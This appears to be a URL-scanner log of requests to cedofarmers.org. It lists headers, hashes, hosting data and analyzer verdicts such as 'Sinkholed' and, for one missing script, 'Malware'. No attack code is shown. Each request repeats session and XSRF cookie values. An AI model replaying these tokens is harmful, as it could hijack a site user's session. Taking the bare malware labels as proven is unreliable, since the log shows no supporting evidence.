Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:24 GMT
accept-ranges: bytes
content-length: 16992
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226099-idrc_logo.png
192.185.57.117 200 OK 19 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226099-idrc_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 600 x 138, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 b84e72d2691312625aec39da7e26b1c8
SHA1 512d979aaafcb147e8da1ff27a202c83ce904690
SHA256 f3630581290816968d46650aa3a4e6b87dd96cac7eb5ccf9ca513a7461c8f19f
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226099-idrc_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:38 GMT
accept-ranges: bytes
content-length: 18864
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604667043-GAC.jpg
192.185.57.117 200 OK 18 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604667043-GAC.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 782x84, components 3
- data
Hash MD5 68860c558193b9c06ad87590544260c8
SHA1 9301bb291f1b44834fa4e2b80b3ced0828fac9cc
SHA256 d12bb2d859f25717a11a9f2bbed1f9659713ec98177e9743515a9ad759ba32ba
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604667043-GAC.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 06 Nov 2020 09:50:44 GMT
accept-ranges: bytes
content-length: 18426
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226170-naccri_logo.gif
192.185.57.117 200 OK 23 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226170-naccri_logo.gif
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type GIF image data, version 89a, 363 x 215
- data
Hash MD5 b1518cc05cd30d01c564d7b805477fcd
SHA1 37befe6a7ee22438729b40c59e1b60883e70a493
SHA256 6512e90f7eb83d3cb1cfcb5feaf0daf69d224a70ca18e1a1ea528223f1fd9797
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226170-naccri_logo.gif HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:50 GMT
accept-ranges: bytes
content-length: 22584
content-type: image/gif
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226177-NARO_logo.png
192.185.57.117 200 OK 22 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226177-NARO_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 110 x 115, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 d88ead51d157daeb14f1fa4bef294888
SHA1 3257637eccca18810f172d4b659d288c4b2565d6
SHA256 b17ae365c55ef7ded5aa0a72cc42a8ce2c3330cae2d68f14b7af8e1f40ad4ba5
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226177-NARO_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:56 GMT
accept-ranges: bytes
content-length: 22156
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226042-CIAT_logo.png
192.185.57.117 200 OK 26 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226042-CIAT_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 546 x 262, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 fa6fbaa6375ea882f3ed89b9873c54ef
SHA1 6be564842ac991e86873875fbdbc5fe38d6d4f62
SHA256 295dfb343ff16792b8e1c59a47ccbf77fde7a4481dcd2b78ca13a3a033a1ce3f
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226042-CIAT_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:42 GMT
accept-ranges: bytes
content-length: 26151
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226242-unihoffen_logo.png
192.185.57.117 200 OK 32 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226242-unihoffen_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 1200 x 630, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 274488a5926f3abd2d033b657a1ca661
SHA1 cb36c76e5a984a14ea5098fbb46b15e390560cd0
SHA256 c28e456d7421c182180b7e0b04d8813609cf9abaf30e44c5dd4cfb790420aa94
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226242-unihoffen_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:24:02 GMT
accept-ranges: bytes
content-length: 31987
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/google-map.js
192.185.57.117 404 Not Found 2.4 kB URL HTTP/2 cedofarmers.org/js/google-map.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text
- HTML document text
- HTML document text
- HTML document text
- HTML document text
- exported SGML document text
- exported SGML document, ASCII text, with very long lines (5395)
Hash MD5 2cdccc9eccc72b2742298d87caffaad1
SHA1 6edb66f8bee92447167a98055ae225ee85945647
SHA256 a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert
fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/google-map.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 404 Not Found
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:42 GMT
vary: Accept-Encoding
content-encoding: gzip
content-length: 2401
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226009-aciar_logo.png
192.185.57.117 200 OK 24 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226009-aciar_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 300 x 74, 8-bit/color RGBA, non-interlaced
- data
Hash MD5 77445a24baf789dc455d546e9a648f27
SHA1 4110ca088be4f164d509a845083e32006bdf8bf1
SHA256 e87872696cbc1b239bcd07500d471f14decdb8b5b06f1f405c83fcac4a86f1dd
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226009-aciar_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:08 GMT
accept-ranges: bytes
content-length: 24150
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/ckuploads/files/background1(1).jpg
192.185.57.117 200 OK 0 B URL HTTP/2 cedofarmers.org/ckuploads/files/background1(1).jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /ckuploads/files/background1(1).jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 06:39:12 GMT
accept-ranges: bytes
content-length: 410126
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226204-pabra_logo.jpg
192.185.57.117 200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226204-pabra_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226204-pabra_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:24 GMT
accept-ranges: bytes
content-length: 77922
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226229-unigeorg_logo.png
192.185.57.117 200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226229-unigeorg_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226229-unigeorg_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
